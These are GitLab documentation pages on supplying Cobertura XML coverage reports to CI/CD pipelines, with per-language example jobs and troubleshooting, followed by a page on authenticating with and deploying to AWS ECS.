## Limits A limit of 100 `<source>` nodes for Cobertura format XML files applies. If your Cobertura report exceeds 100 nodes, there can be mismatches or no matches in the merge request diff view. A single Cobertura XML file can be no more than 10 MiB. For large projects, split the Cobertura XML into smaller files. See [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/328772) for more details. When submitting many files, it can take a few minutes for coverage to show on a merge request. The visualization only displays after the pipeline is complete. If the pipeline has a [blocking manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline waits for the manual job before continuing and is not considered complete. The visualization cannot be displayed if the blocking manual job did not run. If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization). ### Automatic class path correction The coverage report properly matches changed files only if the `filename` of a `class` element contains the full path relative to the project root. However, in some coverage analysis frameworks, the generated Cobertura XML has the `filename` path relative to the class package directory instead. To make an intelligent guess on the project root relative `class` path, the Cobertura XML parser attempts to build the full path by: - Extracting a portion of the `source` paths from the `sources` element and combining them with the class `filename` path. - Checking if the candidate path exists in the project. - Using the first candidate that matches as the class full path. #### Path correction example As an example, a C# project with: - A full path of `test-org/test-cs-project`. 
- The following files relative to the project root: ```shell Auth/User.cs Lib/Utils/User.cs ``` - `sources` from Cobertura XML, the following paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`: ```xml <sources> <source>/builds/test-org/test-cs-project/Auth</source> <source>/builds/test-org/test-cs-project/Lib/Utils</source> </sources> ``` The parser: - Extracts `Auth` and `Lib/Utils` from the `sources` and uses these to determine the `class` path relative to the project root. - Combines these extracted `sources` and the class filename. For example, if there is a `class` element with the `filename` value of `User.cs`, the parser takes the first candidate path that matches, which is `Auth/User.cs`. - For each `class` element, attempts to look for a match for each extracted `source` path up to 100 iterations. If it reaches this limit without finding a matching path in the file tree, the class is not included in the final coverage report. Automatic class path correction also works for a Java project with: - A full path of `test-org/test-java-project`. - The following files relative to the project root: ```shell src/main/java/com/gitlab/security_products/tests/App.java ``` - `sources` from Cobertura XML: ```xml <sources> <source>/builds/test-org/test-java-project/src/main/java/</source> </sources> ``` - `class` element with the `filename` value of `com/gitlab/security_products/tests/App.java`: ```xml <class name="com.gitlab.security_products.tests.App" filename="com/gitlab/security_products/tests/App.java" line-rate="0.0" branch-rate="0.0" complexity="6.0"> ``` {{< alert type="note" >}} Automatic class path correction only works on `source` paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`. The `source` is ignored if the path does not follow this pattern. The parser assumes that the `filename` of a `class` element contains the full path relative to the project root. 
{{< /alert >}} ## Example test coverage configurations This section provides test coverage configuration examples for different programming languages. You can also see a working example in the [`coverage-report`](https://gitlab.com/gitlab-org/ci-sample-projects/coverage-report/) demonstration project. ### JavaScript example The following `.gitlab-ci.yml` example uses [Mocha](https://mochajs.org/) JavaScript testing and [nyc](https://github.com/istanbuljs/nyc) coverage-tooling to generate the coverage artifact: ```yaml test: script: - npm install - npx nyc --reporter cobertura mocha artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ``` ### Java and Kotlin examples The Maven and Gradle examples convert JaCoCo reports into Cobertura format. Alternatively, [issue 227345](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) tracks the work to enable [native JaCoCo report support](jacoco.md). #### Maven example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Maven](https://maven.apache.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: maven:3.6.3-jdk-11 script: - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report artifacts: paths: - target/site/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or choose an existing stage like `deploy`. 
stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.9 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py target/site/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > target/site/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: target/site/cobertura.xml ``` #### Gradle example The following `.gitlab-ci.yml` example for Java or Kotlin uses [Gradle](https://gradle.org/) to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to generate the coverage artifact. You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image. GitLab expects the artifact in the Cobertura format, so you have to execute a few scripts before uploading it. The `test-jdk11` job tests the code and generates an XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report: ```yaml test-jdk11: stage: test image: gradle:6.6.1-jdk11 script: - 'gradle test jacocoTestReport' # jacoco must be configured to create an xml report artifacts: paths: - build/jacoco/jacoco.xml coverage-jdk11: # Must be in a stage later than test-jdk11's stage. # The `visualize` stage does not exist by default. # Please define it first, or chose an existing stage like `deploy`. 
stage: visualize image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.7 script: # convert report from jacoco to cobertura, using relative project path - python /opt/cover2cover.py build/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > build/cobertura.xml needs: ["test-jdk11"] artifacts: reports: coverage_report: coverage_format: cobertura path: build/cobertura.xml ``` ### Python example The following `.gitlab-ci.yml` example uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data: ```yaml run tests: stage: test image: python:3 script: - pip install pytest pytest-cov - pytest --cov --cov-report term --cov-report xml:coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### PHP example The following `.gitlab-ci.yml` example for PHP uses [PHPUnit](https://phpunit.readthedocs.io/) to collect test coverage data and generate the report. With a minimal [`phpunit.xml`](https://docs.phpunit.de/en/11.0/configuration.html) file (you may reference [this example repository](https://gitlab.com/yookoala/code-coverage-visualization-with-php/)), you can run the test and generate the `coverage.xml`: ```yaml run tests: stage: test image: php:latest variables: XDEBUG_MODE: coverage before_script: - apt-get update && apt-get -yq install git unzip zip libzip-dev zlib1g-dev - docker-php-ext-install zip - pecl install xdebug && docker-php-ext-enable xdebug - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');" - php composer-setup.php --install-dir=/usr/local/bin --filename=composer - composer install - composer require --dev phpunit/phpunit phpunit/php-code-coverage script: - php ./vendor/bin/phpunit --coverage-text --coverage-cobertura=coverage.cobertura.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.cobertura.xml ``` [Codeception](https://codeception.com/), through PHPUnit, also supports generating Cobertura report with 
[`run`](https://codeception.com/docs/reference/Commands#run). The path for the generated file depends on the `--coverage-cobertura` option and [`paths`](https://codeception.com/docs/reference/Configuration#paths) configuration for the [unit test suite](https://codeception.com/docs/05-UnitTests). Configure `.gitlab-ci.yml` to find Cobertura in the appropriate path. ### C/C++ example The following `.gitlab-ci.yml` example for C/C++ with `gcc` or `g++` as the compiler uses [`gcovr`](https://gcovr.com/en/stable/) to generate the coverage output file in Cobertura XML format. This example assumes: - That the `Makefile` is created by `cmake` in the `build` directory, in another job in a previous stage. (If you use `automake` to generate the `Makefile`, then you need to call `make check` instead of `make test`.) - `cmake` (or `automake`) has set the compiler option `--coverage`. ```yaml run tests: stage: test script: - cd build - make test - gcovr --xml-pretty --exclude-unreachable-branches --print-summary -o coverage.xml --root ${CI_PROJECT_DIR} artifacts: name: ${CI_JOB_NAME}-${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHA} expire_in: 2 days reports: coverage_report: coverage_format: cobertura path: build/coverage.xml ``` ### Go example The following `.gitlab-ci.yml` example for Go uses: - [`go test`](https://go.dev/doc/tutorial/add-a-test) to run tests. - [`gocover-cobertura`](https://github.com/boumenot/gocover-cobertura) to convert Go's coverage profile into the Cobertura XML format. This example assumes that [Go modules](https://go.dev/ref/mod) are being used. The `-covermode count` option does not work with the `-race` flag. If you want to generate code coverage while also using the `-race` flag, you must switch to `-covermode atomic` which is slower than `-covermode count`. See [this blog post](https://go.dev/blog/cover) for more details. ```yaml run tests: stage: test image: golang:1.17 script: - go install - go test ./... 
-coverprofile=coverage.txt -covermode count - go get github.com/boumenot/gocover-cobertura - go run github.com/boumenot/gocover-cobertura < coverage.txt > coverage.xml artifacts: reports: coverage_report: coverage_format: cobertura path: coverage.xml ``` ### Ruby example The following `.gitlab-ci.yml` example for Ruby uses - [`rspec`](https://rspec.info/) to run tests. - [`simplecov`](https://github.com/simplecov-ruby/simplecov) and [`simplecov-cobertura`](https://github.com/dashingrocket/simplecov-cobertura) to record the coverage profile and create a report in the Cobertura XML format. This example assumes: - That [`bundler`](https://bundler.io/) is being used for dependency management. The `rspec`, `simplecov` and `simplecov-cobertura` gems have been added to your `Gemfile`. - The `CoberturaFormatter` has been added to your `SimpleCov.formatters` configuration in the `spec_helper.rb` file. ```yaml run tests: stage: test image: ruby:3.1 script: - bundle install - bundle exec rspec artifacts: reports: coverage_report: coverage_format: cobertura path: coverage/coverage.xml ``` ## Troubleshooting ### Test coverage visualization not displayed If the test coverage visualization is not displayed in the diff view, you can check the coverage report itself and verify that: - The file you are viewing in the diff view is mentioned in the coverage report. - The `source` and `filename` nodes in the report follows the [expected structure](#automatic-class-path-correction) to match the files in your repository. - The pipeline has completed. If the pipeline is [blocked on a manual job](../../jobs/job_control.md#types-of-manual-jobs), the pipeline is not considered complete. - The coverage report file does not exceed the [limits](#limits). Report artifacts are not downloadable by default. 
If you want the report to be downloadable from the job details page, add your coverage report to the artifact `paths`: ```yaml artifacts: paths: - coverage/cobertura-coverage.xml reports: coverage_report: coverage_format: cobertura path: coverage/cobertura-coverage.xml ```
---
stage: Verify
group: Pipeline Execution
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Cobertura coverage report
breadcrumbs:
- doc
- ci
- testing
- code_coverage
---

{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

For the coverage analysis to work, you have to provide a properly formatted
[Cobertura XML](https://cobertura.github.io/cobertura/) report to
[`artifacts:reports:coverage_report`](../../yaml/artifacts_reports.md#artifactsreportscoverage_report).
This format was originally developed for Java, but most coverage analysis frameworks
for other languages and platforms have plugins to add support for it, like:

- [simplecov-cobertura](https://rubygems.org/gems/simplecov-cobertura) (Ruby)
- [gocover-cobertura](https://github.com/boumenot/gocover-cobertura) (Go)
- [cobertura](https://www.npmjs.com/package/cobertura) (Node.js)

Other coverage analysis frameworks support the format out of the box, for example:

- [Istanbul](https://istanbul.js.org/docs/advanced/alternative-reporters/#cobertura) (JavaScript)
- [Coverage.py](https://coverage.readthedocs.io/en/coverage-5.0.4/cmd.html#xml-reporting) (Python)
- [PHPUnit](https://github.com/sebastianbergmann/phpunit-documentation-english/blob/master/src/textui.rst#command-line-options) (PHP)

After configuration, if your merge request triggers a pipeline that collects coverage reports,
the coverage information is displayed in the diff view. This includes reports from any job in
any stage in the pipeline.
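The wiring is the same regardless of language or framework; a minimal job that publishes such a report might look like the following sketch (the job name, script command, and report path are placeholders — the language-specific examples later on this page show real commands):

```yaml
test:
  script:
    - ./run-tests-with-coverage   # placeholder: any command that writes a Cobertura XML file
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage/cobertura-coverage.xml
```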
The coverage displays for each line:

- `covered` (green): lines which have been checked at least once by tests
- `no test coverage` (orange): lines which are loaded but never executed
- no coverage information: lines which are non-instrumented or not loaded

Hovering over the coverage bar provides further information, such as the number
of times the line was checked by tests.

Uploading a test coverage report does not enable:

- [Test coverage results](_index.md#view-coverage-results) in the merge request widget.
- [Code coverage history](_index.md#view-coverage-history).

You must configure these separately.

## Limits

A limit of 100 `<source>` nodes for Cobertura format XML files applies. If your Cobertura report exceeds
100 nodes, there can be mismatches or no matches in the merge request diff view.

A single Cobertura XML file can be no more than 10 MiB. For large projects, split the Cobertura XML into
smaller files. See [this issue](https://gitlab.com/gitlab-org/gitlab/-/issues/328772) for more details.

When submitting many files, it can take a few minutes for coverage to show on a merge request.

The visualization only displays after the pipeline is complete. If the pipeline has
a [blocking manual job](../../jobs/job_control.md#types-of-manual-jobs), the
pipeline waits for the manual job before continuing and is not considered complete.
The visualization cannot be displayed if the blocking manual job did not run.

If the job generates multiple reports, [use a wildcard in the artifact path](_index.md#configure-coverage-visualization).

### Automatic class path correction

The coverage report properly matches changed files only if the `filename` of a `class` element
contains the full path relative to the project root. However, in some coverage analysis frameworks,
the generated Cobertura XML has the `filename` path relative to the class package directory instead.
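What such a correction amounts to can be sketched in a few lines of Python. This is an illustration only, not GitLab's actual implementation; all paths and names are taken from the C# example that follows:

```python
# Illustrative sketch of Cobertura class path correction (not GitLab's actual code).
# A <source> like /builds/<group>/<project>/Auth is reduced to the part after the
# project root ("Auth"), joined with the class `filename`, and checked against the
# repository file tree; the first existing candidate wins.

def correct_class_path(sources, class_filename, project_files, builds_prefix):
    for source in sources:
        if not source.startswith(builds_prefix):
            continue  # sources outside <CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/ are ignored
        relative = source[len(builds_prefix):].strip("/")
        candidate = f"{relative}/{class_filename}" if relative else class_filename
        if candidate in project_files:
            return candidate
    return None  # no match: the class is dropped from the final report


files = {"Auth/User.cs", "Lib/Utils/User.cs"}
prefix = "/builds/test-org/test-cs-project/"
sources = ["/builds/test-org/test-cs-project/Auth",
           "/builds/test-org/test-cs-project/Lib/Utils"]
print(correct_class_path(sources, "User.cs", files, prefix))  # Auth/User.cs
```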
To make an intelligent guess on the project root relative `class` path, the Cobertura XML parser
attempts to build the full path by:

- Extracting a portion of the `source` paths from the `sources` element and combining them
  with the class `filename` path.
- Checking if the candidate path exists in the project.
- Using the first candidate that matches as the class full path.

#### Path correction example

As an example, a C# project with:

- A full path of `test-org/test-cs-project`.
- The following files relative to the project root:

  ```shell
  Auth/User.cs
  Lib/Utils/User.cs
  ```

- `sources` from Cobertura XML, the following paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`:

  ```xml
  <sources>
    <source>/builds/test-org/test-cs-project/Auth</source>
    <source>/builds/test-org/test-cs-project/Lib/Utils</source>
  </sources>
  ```

The parser:

- Extracts `Auth` and `Lib/Utils` from the `sources` and uses these to determine the `class` path
  relative to the project root.
- Combines these extracted `sources` and the class filename. For example, if there is a `class`
  element with the `filename` value of `User.cs`, the parser takes the first candidate path that
  matches, which is `Auth/User.cs`.
- For each `class` element, attempts to look for a match for each extracted `source` path up to
  100 iterations. If it reaches this limit without finding a matching path in the file tree, the
  class is not included in the final coverage report.

Automatic class path correction also works for a Java project with:

- A full path of `test-org/test-java-project`.
- The following files relative to the project root:

  ```shell
  src/main/java/com/gitlab/security_products/tests/App.java
  ```

- `sources` from Cobertura XML:

  ```xml
  <sources>
    <source>/builds/test-org/test-java-project/src/main/java/</source>
  </sources>
  ```

- `class` element with the `filename` value of `com/gitlab/security_products/tests/App.java`:

  ```xml
  <class name="com.gitlab.security_products.tests.App" filename="com/gitlab/security_products/tests/App.java" line-rate="0.0" branch-rate="0.0" complexity="6.0">
  ```

{{< alert type="note" >}}

Automatic class path correction only works on `source` paths in the format `<CI_BUILDS_DIR>/<PROJECT_FULL_PATH>/...`.
The `source` is ignored if the path does not follow this pattern. The parser assumes that the
`filename` of a `class` element contains the full path relative to the project root.

{{< /alert >}}

## Example test coverage configurations

This section provides test coverage configuration examples for different programming languages.
You can also see a working example in the
[`coverage-report`](https://gitlab.com/gitlab-org/ci-sample-projects/coverage-report/) demonstration project.

### JavaScript example

The following `.gitlab-ci.yml` example uses [Mocha](https://mochajs.org/)
JavaScript testing and [nyc](https://github.com/istanbuljs/nyc) coverage-tooling to
generate the coverage artifact:

```yaml
test:
  script:
    - npm install
    - npx nyc --reporter cobertura mocha
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage/cobertura-coverage.xml
```

### Java and Kotlin examples

The Maven and Gradle examples convert JaCoCo reports into Cobertura format. Alternatively,
[issue 227345](https://gitlab.com/gitlab-org/gitlab/-/issues/227345) tracks the work
to enable [native JaCoCo report support](jacoco.md).
#### Maven example

The following `.gitlab-ci.yml` example for Java or Kotlin uses [Maven](https://maven.apache.org/)
to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to
generate the coverage artifact.
You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image.

GitLab expects the artifact in the Cobertura format, so you have to execute a few
scripts before uploading it. The `test-jdk11` job tests the code and generates an
XML artifact. The `coverage-jdk-11` job converts the artifact into a Cobertura report:

```yaml
test-jdk11:
  stage: test
  image: maven:3.6.3-jdk-11
  script:
    - mvn $MAVEN_CLI_OPTS clean org.jacoco:jacoco-maven-plugin:prepare-agent test jacoco:report
  artifacts:
    paths:
      - target/site/jacoco/jacoco.xml

coverage-jdk11:
  # Must be in a stage later than test-jdk11's stage.
  # The `visualize` stage does not exist by default.
  # Please define it first, or choose an existing stage like `deploy`.
  stage: visualize
  image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.9
  script:
    # convert report from jacoco to cobertura, using relative project path
    - python /opt/cover2cover.py target/site/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > target/site/cobertura.xml
  needs: ["test-jdk11"]
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: target/site/cobertura.xml
```

#### Gradle example

The following `.gitlab-ci.yml` example for Java or Kotlin uses [Gradle](https://gradle.org/)
to build the project and [JaCoCo](https://www.eclemma.org/jacoco/) coverage-tooling to
generate the coverage artifact.
You can check the [Docker image configuration and scripts](https://gitlab.com/haynes/jacoco2cobertura) if you want to build your own image.

GitLab expects the artifact in the Cobertura format, so you have to execute a few
scripts before uploading it. The `test-jdk11` job tests the code and generates an
XML artifact.
The `coverage-jdk-11` job converts the artifact into a Cobertura report:

```yaml
test-jdk11:
  stage: test
  image: gradle:6.6.1-jdk11
  script:
    - 'gradle test jacocoTestReport' # jacoco must be configured to create an xml report
  artifacts:
    paths:
      - build/jacoco/jacoco.xml

coverage-jdk11:
  # Must be in a stage later than test-jdk11's stage.
  # The `visualize` stage does not exist by default.
  # Please define it first, or choose an existing stage like `deploy`.
  stage: visualize
  image: registry.gitlab.com/haynes/jacoco2cobertura:1.0.7
  script:
    # convert report from jacoco to cobertura, using relative project path
    - python /opt/cover2cover.py build/jacoco/jacoco.xml $CI_PROJECT_DIR/src/main/java/ > build/cobertura.xml
  needs: ["test-jdk11"]
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: build/cobertura.xml
```

### Python example

The following `.gitlab-ci.yml` example uses [pytest-cov](https://pytest-cov.readthedocs.io/) to collect test coverage data:

```yaml
run tests:
  stage: test
  image: python:3
  script:
    - pip install pytest pytest-cov
    - pytest --cov --cov-report term --cov-report xml:coverage.xml
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage.xml
```

### PHP example

The following `.gitlab-ci.yml` example for PHP uses [PHPUnit](https://phpunit.readthedocs.io/)
to collect test coverage data and generate the report.
With a minimal [`phpunit.xml`](https://docs.phpunit.de/en/11.0/configuration.html) file (you may
reference [this example repository](https://gitlab.com/yookoala/code-coverage-visualization-with-php/)),
you can run the test and generate the `coverage.xml`:

```yaml
run tests:
  stage: test
  image: php:latest
  variables:
    XDEBUG_MODE: coverage
  before_script:
    - apt-get update && apt-get -yq install git unzip zip libzip-dev zlib1g-dev
    - docker-php-ext-install zip
    - pecl install xdebug && docker-php-ext-enable xdebug
    - php -r "copy('https://getcomposer.org/installer', 'composer-setup.php');"
    - php composer-setup.php --install-dir=/usr/local/bin --filename=composer
    - composer install
    - composer require --dev phpunit/phpunit phpunit/php-code-coverage
  script:
    - php ./vendor/bin/phpunit --coverage-text --coverage-cobertura=coverage.cobertura.xml
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage.cobertura.xml
```

[Codeception](https://codeception.com/), through PHPUnit, also supports generating Cobertura report with
[`run`](https://codeception.com/docs/reference/Commands#run). The path for the generated file
depends on the `--coverage-cobertura` option and [`paths`](https://codeception.com/docs/reference/Configuration#paths)
configuration for the [unit test suite](https://codeception.com/docs/05-UnitTests). Configure
`.gitlab-ci.yml` to find Cobertura in the appropriate path.

### C/C++ example

The following `.gitlab-ci.yml` example for C/C++ with
`gcc` or `g++` as the compiler uses [`gcovr`](https://gcovr.com/en/stable/) to generate the coverage
output file in Cobertura XML format.

This example assumes:

- That the `Makefile` is created by `cmake` in the `build` directory,
  in another job in a previous stage.
  (If you use `automake` to generate the `Makefile`,
  then you need to call `make check` instead of `make test`.)
- `cmake` (or `automake`) has set the compiler option `--coverage`.
```yaml
run tests:
  stage: test
  script:
    - cd build
    - make test
    - gcovr --xml-pretty --exclude-unreachable-branches --print-summary -o coverage.xml --root ${CI_PROJECT_DIR}
  artifacts:
    name: ${CI_JOB_NAME}-${CI_COMMIT_REF_NAME}-${CI_COMMIT_SHA}
    expire_in: 2 days
    reports:
      coverage_report:
        coverage_format: cobertura
        path: build/coverage.xml
```

### Go example

The following `.gitlab-ci.yml` example for Go uses:

- [`go test`](https://go.dev/doc/tutorial/add-a-test) to run tests.
- [`gocover-cobertura`](https://github.com/boumenot/gocover-cobertura) to convert Go's coverage profile
  into the Cobertura XML format.

This example assumes that [Go modules](https://go.dev/ref/mod) are being used.
The `-covermode count` option does not work with the `-race` flag.
If you want to generate code coverage while also using the `-race` flag, you must switch to
`-covermode atomic` which is slower than `-covermode count`. See
[this blog post](https://go.dev/blog/cover) for more details.

```yaml
run tests:
  stage: test
  image: golang:1.17
  script:
    - go install
    - go test ./... -coverprofile=coverage.txt -covermode count
    - go get github.com/boumenot/gocover-cobertura
    - go run github.com/boumenot/gocover-cobertura < coverage.txt > coverage.xml
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage.xml
```

### Ruby example

The following `.gitlab-ci.yml` example for Ruby uses:

- [`rspec`](https://rspec.info/) to run tests.
- [`simplecov`](https://github.com/simplecov-ruby/simplecov) and
  [`simplecov-cobertura`](https://github.com/dashingrocket/simplecov-cobertura)
  to record the coverage profile and create a report in the Cobertura XML format.

This example assumes:

- That [`bundler`](https://bundler.io/) is being used for dependency management.
  The `rspec`, `simplecov` and `simplecov-cobertura` gems have been added to your `Gemfile`.
- The `CoberturaFormatter` has been added to your `SimpleCov.formatters`
  configuration in the `spec_helper.rb` file.
```yaml
run tests:
  stage: test
  image: ruby:3.1
  script:
    - bundle install
    - bundle exec rspec
  artifacts:
    reports:
      coverage_report:
        coverage_format: cobertura
        path: coverage/coverage.xml
```

## Troubleshooting

### Test coverage visualization not displayed

If the test coverage visualization is not displayed in the diff view, you can check
the coverage report itself and verify that:

- The file you are viewing in the diff view is mentioned in the coverage report.
- The `source` and `filename` nodes in the report follow the [expected structure](#automatic-class-path-correction)
  to match the files in your repository.
- The pipeline has completed. If the pipeline is [blocked on a manual job](../../jobs/job_control.md#types-of-manual-jobs),
  the pipeline is not considered complete.
- The coverage report file does not exceed the [limits](#limits).

Report artifacts are not downloadable by default. If you want the report to be downloadable
from the job details page, add your coverage report to the artifact `paths`:

```yaml
artifacts:
  paths:
    - coverage/cobertura-coverage.xml
  reports:
    coverage_report:
      coverage_format: cobertura
      path: coverage/cobertura-coverage.xml
```
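You can check the first two points locally before pushing by parsing the report yourself. The following is a rough sketch, not an official GitLab tool; the report path is a placeholder:

```python
# Rough local check of a Cobertura report (illustrative, not an official GitLab tool):
# list every class `filename` in the report and flag those that do not exist
# relative to the repository root, since those cannot match files in the diff view.
import os
import xml.etree.ElementTree as ET


def missing_class_files(report_path, repo_root="."):
    tree = ET.parse(report_path)
    missing = []
    for cls in tree.getroot().iter("class"):
        filename = cls.get("filename", "")
        if not os.path.exists(os.path.join(repo_root, filename)):
            missing.append(filename)
    return missing


# Example usage (placeholder path):
# print(missing_class_files("coverage/cobertura-coverage.xml"))
```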
---
stage: Deploy
group: Environments
info: To determine the technical writer assigned to the Stage/Group associated with this page, see https://handbook.gitlab.com/handbook/product/ux/technical-writing/#assignments
title: Deploy to AWS from GitLab CI/CD
breadcrumbs:
- doc
- ci
- cloud_deployment
---
{{< details >}}

- Tier: Free, Premium, Ultimate
- Offering: GitLab.com, GitLab Self-Managed, GitLab Dedicated

{{< /details >}}

GitLab provides Docker images with the libraries and tools you need to deploy
to AWS. You can reference these images in your CI/CD pipeline.

If you're using GitLab.com and deploying to the [Amazon Elastic Container Service](https://aws.amazon.com/ecs/) (ECS),
read about [deploying to ECS](ecs/deploy_to_aws_ecs.md).

{{< alert type="note" >}}

If you are comfortable configuring a deployment yourself and just need to retrieve
AWS credentials, consider using [ID tokens and OpenID Connect](../cloud_services/aws/_index.md).
ID tokens are more secure than storing credentials in CI/CD variables, but do not work
with the guidance on this page.

{{< /alert >}}

## Authenticate GitLab with AWS

To use GitLab CI/CD to connect to AWS, you must authenticate.
After you set up authentication, you can configure CI/CD to deploy.

1. Sign on to your AWS account.
1. Create [an IAM user](https://console.aws.amazon.com/iam/home#/home).
1. Select your user to access its details. Go to **Security credentials > Create a new access key**.
1. Note the **Access key ID** and **Secret access key**.
1. In your GitLab project, go to **Settings > CI/CD**. Set the following
   [CI/CD variables](../variables/_index.md):

   | Environment variable name | Value |
   |:--------------------------|:------|
   | `AWS_ACCESS_KEY_ID`       | Your Access key ID. |
   | `AWS_SECRET_ACCESS_KEY`   | Your secret access key. |
   | `AWS_DEFAULT_REGION`      | Your region code. You might want to confirm that the AWS service you intend to use is [available in the chosen region](https://aws.amazon.com/about-aws/global-infrastructure/regional-product-services/). |

1. Variables are [protected by default](../variables/_index.md#protect-a-cicd-variable).
   To use GitLab CI/CD with branches or tags that are not protected,
   clear the **Protect variable** checkbox.
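Before wiring up a full deployment, you can confirm the variables are picked up with a throwaway job. This is an illustrative sketch (the job name is a placeholder); `aws sts get-caller-identity` prints the account and IAM identity the credentials resolve to, so a green job means authentication works:

```yaml
verify-aws-auth:
  image: registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest
  script:
    - aws sts get-caller-identity
```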
## Use an image to run AWS commands

If an image contains the [AWS Command Line Interface](https://aws.amazon.com/cli/),
you can reference the image in your project's `.gitlab-ci.yml` file. Then you can run
`aws` commands in your CI/CD jobs. For example:

```yaml
deploy:
  stage: deploy
  image: registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest
  script:
    - aws s3 ...
    - aws create-deployment ...
  environment: production
```

GitLab provides a Docker image that includes the AWS CLI:

- Images are hosted in the GitLab container registry. The latest image is
  `registry.gitlab.com/gitlab-org/cloud-deploy/aws-base:latest`.
- [Images are stored in a GitLab repository](https://gitlab.com/gitlab-org/cloud-deploy/-/tree/master/aws).

Alternately, you can use an [Amazon Elastic Container Registry (ECR)](https://aws.amazon.com/ecr/) image.
[Learn how to push an image to your ECR repository](https://docs.aws.amazon.com/AmazonECR/latest/userguide/docker-push-ecr-image.html).

You can also use an image from any third-party registry.

## Deploy your application to ECS

You can automate deployments of your application to your
[Amazon ECS](https://aws.amazon.com/ecs/) cluster.

Prerequisites:

- [Authenticate AWS with GitLab](#authenticate-gitlab-with-aws).
- Create a cluster on Amazon ECS.
- Create related components, like an ECS service or a database on Amazon RDS.
- Create an ECS task definition, where the value for the `containerDefinitions[].name` attribute is
  the same as the `Container name` defined in your targeted ECS service. The task definition can be:
  - An existing task definition in ECS.
  - A JSON file in your GitLab project. Use the
    [template in the AWS documentation](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/create-task-definition.html#task-definition-template)
    and save the file in your project. For example `<project-root>/ci/aws/task-definition.json`.

To deploy to your ECS cluster:

1. In your GitLab project, go to **Settings > CI/CD**.
Set the following [CI/CD variables](../variables/_index.md). You can find these names by selecting the targeted cluster on your [Amazon ECS dashboard](https://console.aws.amazon.com/ecs/home). | Environment variable name | Value | |:----------------------------------|:------| | `CI_AWS_ECS_CLUSTER` | The name of the AWS ECS cluster that you're targeting for your deployments. | | `CI_AWS_ECS_SERVICE` | The name of the targeted service tied to your AWS ECS cluster. Ensure that this variable is scoped to the appropriate environment (`production`, `staging`, `review/*`). | | `CI_AWS_ECS_TASK_DEFINITION` | If the task definition is in ECS, the name of the task definition tied to the service. | | `CI_AWS_ECS_TASK_DEFINITION_FILE` | If the task definition is a JSON file in GitLab, the filename, including the path. For example, `ci/aws/my_task_definition.json`. If the name of the task definition in your JSON file is the same name as an existing task definition in ECS, then a new revision is created when CI/CD runs. Otherwise, a brand new task definition is created, starting at revision 1. | {{< alert type="warning" >}} If you define both `CI_AWS_ECS_TASK_DEFINITION_FILE` and `CI_AWS_ECS_TASK_DEFINITION`, `CI_AWS_ECS_TASK_DEFINITION_FILE` takes precedence. {{< /alert >}} 1. Include this template in `.gitlab-ci.yml`: ```yaml include: - template: AWS/Deploy-ECS.gitlab-ci.yml ``` The `AWS/Deploy-ECS` template ships with GitLab and is available [on GitLab.com](https://gitlab.com/gitlab-org/gitlab/-/blob/master/lib/gitlab/ci/templates/AWS/Deploy-ECS.gitlab-ci.yml). 1. Commit and push your updated `.gitlab-ci.yml` to your project's repository. Your application Docker image is rebuilt and pushed to the GitLab container registry. If your image is located in a private registry, make sure your task definition is [configured with a `repositoryCredentials` attribute](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/private-auth.html). 
